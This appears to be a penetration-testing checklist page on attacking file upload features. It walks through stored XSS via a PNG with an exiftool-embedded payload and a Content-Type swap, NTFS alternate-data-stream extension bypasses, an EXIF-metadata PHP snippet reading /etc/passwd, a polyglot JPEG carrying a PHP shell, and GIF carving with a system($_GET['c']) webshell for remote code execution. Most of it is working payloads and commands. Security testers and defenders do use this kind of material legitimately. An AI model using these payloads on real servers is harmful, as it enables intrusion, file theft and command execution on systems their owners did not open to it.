Upload of Malicious Files

Check List

Methodology

Black Box

XSS Stored via Upload avatar PNG [HTML]

1

Create Malicious PNG Payload

2

Download the XSS payload PNG from

https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XSS%20Injection/Files/xss_comment_exif_metadata_double_quote.png

or use exiftool to embed

exiftool -Comment="">alert(prompt('XSS BY ZEROX4'))" xss_comment_exif_metadata_double_quote.pn
3

Access Avatar Upload Page

4

Go to the locate the avatar upload form

5

Intercept Upload Request in Burp Suite

6

Modify Content-Type to text/html

7

Edit the Content-Type header for the uploaded file from image/png to text/html in the request

8

Submit Modified Request

9

Forward the altered request to upload the malicious PNG as HTML

10

Verify Stored XSS Execution

11

Confirm the file is saved on example.com and access it to trigger the alert payload

NTFS Alternate Data Streams (ADS) abuse

1

Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application

PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a OR GIF8;
2

Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server ("file.asax:.jpg") This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions ("file.asp::$data.")

EXIF Metadata Webshell

1

Find a nice picture and embed the shell into the image like this

exiftool -documentname='<?php echo file_get_contents("/etc/passwd"); ?>' picture.png
2

Rename the jpg/png picture to the .php extension

3

Upload the picture

4

You will get an 500 error page. Ignore it. Grep the time from the response and convert it to a timestamp

5

Use the timestamp to find your shell

https://example.org/uploads/profile/[USERNAMAE][timestamp].php

Polyglot File Upload

1

A Magic Number is a unique sequence of bytes at the beginning of a file that identifies its type. Even if a file’s extension is changed, the Magic Number helps the system recognize the actual file format Examples

PNG files start with: 89 50 4E 47 0D 0A 1A 0A
PDF files start with: %PDF-1.7
Content-Disposition: form-data; name="image"; filename="img.jpg"
Content-Type: image/jpeg

ÿØÿàJFIFÿÛC -> jpg Magic Number
... (binary data) ...
ÿÙ
2

I uploaded a normal .jpg image, and the server accepted it, returning a 200 OK status Exploit Attempt

3

I re-send the exact same request, but this time, I modified the image content by embedding the PHP shell code inside it

4

But I send the request and changed the file extension to PHP

Content-Disposition: form-data; name="image"; filename="img.php" -> change to .PHP
Content-Type: image/jpeg

ÿØÿàJFIFÿÛC
... (binary data) ...
<?php
echo "<pre>";
system("uname -a");
echo "</pre>";
?>
ÿÙ
5

Result: The server accepted the modified file and returned 200 OK

GIF Image Carving (PHP Payload Injection)

1

Identify possible image formats (starting with GIF)

2

Test how the server transforms the uploaded image

3

Replicate these transformations locally using ImageMagick and PHP

4

Determine if any sections of the image remain unmodified

5

Inject PHP code into those sections and test execution

6

Testing with GIF

7

I began with a simple one-color (black) GIF image to easily spot modifications. After uploading and downloading the image, I compared the original and transformed versions. The transformations included

Stripping EXIF data

Resizing the image to 300x300 pixels To replicate this locally, I used the following PHP script

<?php
$thumb = new Imagick('testgif.gif');
$thumb->resizeImage(300,300);
$thumb->writeImage('testgif2.gif');
$thumb->destroy();
?>
8

Through testing, I identified an unmodified section of the GIF file filled with 00 values. This provided enough space to inject my PHP payload

9

Payload Injection Using a hex editor in Burp Suite, I inserted the following PHP code into the GIF file

<?php phpinfo();?>
<?php system($_GET['c']);?>
10

By carving these payloads into the unmodified section of the GIF file, I successfully achieved remote code execution after uploading the modified image

White Box

Cheat Sheet

PreviousUpload of Unexpected File TypesNextPayment Functionality

Last updated